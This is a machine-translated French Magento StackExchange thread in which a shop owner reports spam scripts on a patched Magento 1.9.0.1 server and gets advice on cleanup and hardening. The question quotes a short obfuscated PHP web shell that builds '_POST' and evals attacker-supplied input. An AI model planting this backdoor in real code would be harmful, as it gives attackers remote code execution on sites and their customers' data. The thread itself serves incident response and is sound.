'Clean' Magento Installer 1.9.0.1 (patchs installés) Scripts de spam installés?

magento.stackexchange https://magento.stackexchange.com/questions/108031

Question

J'ai quelques bizarres magento.Et une seule boutique en ligne Magento sans extensions et avec toutes les patchs installées a le problème qu'il installe des scripts qui envoient le spam.

Quelques faits:

  • Magento 1.9.0.1
  • pas d'extensions
  • Thème vérifié qui reçoit des mises à jour régulières
  • Thème de l'enfant utilisé pour les personnalisations propres (seulement CSS et Simple HTML)
  • PATCHES Tous installés en cas de besoin

Il est installé sur un VPS sur Centos.php-fpm 5.3 (5.6 comme deuxième PHP) EXIM + Mailgun utilisé pour l'envoi de courrier.

Un échantillon de ce qui est installé: 

<?php
$ugjr9="utrsoe_p";
$kzbf99 =$ugjr9[3]. $ugjr9[1]. $ugjr9[2]. $ugjr9[1]. $ugjr9[4]. $ugjr9[0]. $ugjr9[7]. $ugjr9[7]. $ugjr9[5]. $ugjr9[2];
$dmr4 = $kzbf99($ugjr9[6]. $ugjr9[7] . $ugjr9[4]. $ugjr9[3]. $ugjr9[1] );
if( isset (${$dmr4 }['qa04af1'])) {eval( ${ $dmr4 }['qa04af1' ]) ; }
?>

aide s'il vous plaît

Était-ce utile?

La solution

Si possible, essayez d'identifier la cause première du problème (avec quels logiciels malveillants êtes infectés. Est-ce une magentaine connue?).

Je recommanderais de vérifier que l'un de vos fichiers principaux de votre installation Magento a été modifié ou rechercher des scripts sur votre serveur pouvant causer le problème.

https://blog.amasty. Com / Freebie-Magento-Modified-Core-Files-Files-Signaler-By-AMASTY /

Parce que vous n'utilisez aucune extension, vous pouvez remplacer tous les fichiers principaux par une nouvelle installation pour être sûr.

Regardez également les suggestions suivantes.

https:// www .Linkedin.com / PULSE / 20141210024646-1143212-22-MAYES-TO-BULLEPARALE-VOTRE-MAGENTO-SECURITE

  • Créer un chemin d'administration personnalisé
  • Choisissez un nom d'utilisateur et un mot de passe administrateur long et complexe ( https://strongpasswordenerator.com/ )
  • N'utilisez jamais votre mot de passe Magento admin pour autre chose
  • Utilisez toujours FTP sécurisé
  • Limiter l'accès FTP non sécurisé pour empêcher les scripts méchants de la démolition Havoc
  • Modifiez vos autorisations de fichier
  • Verrouillage de votre gestionnaire Magento Connect
Licencié sous: CC-BY-SA avec attribution
Non affilié à magento.stackexchange
scroll top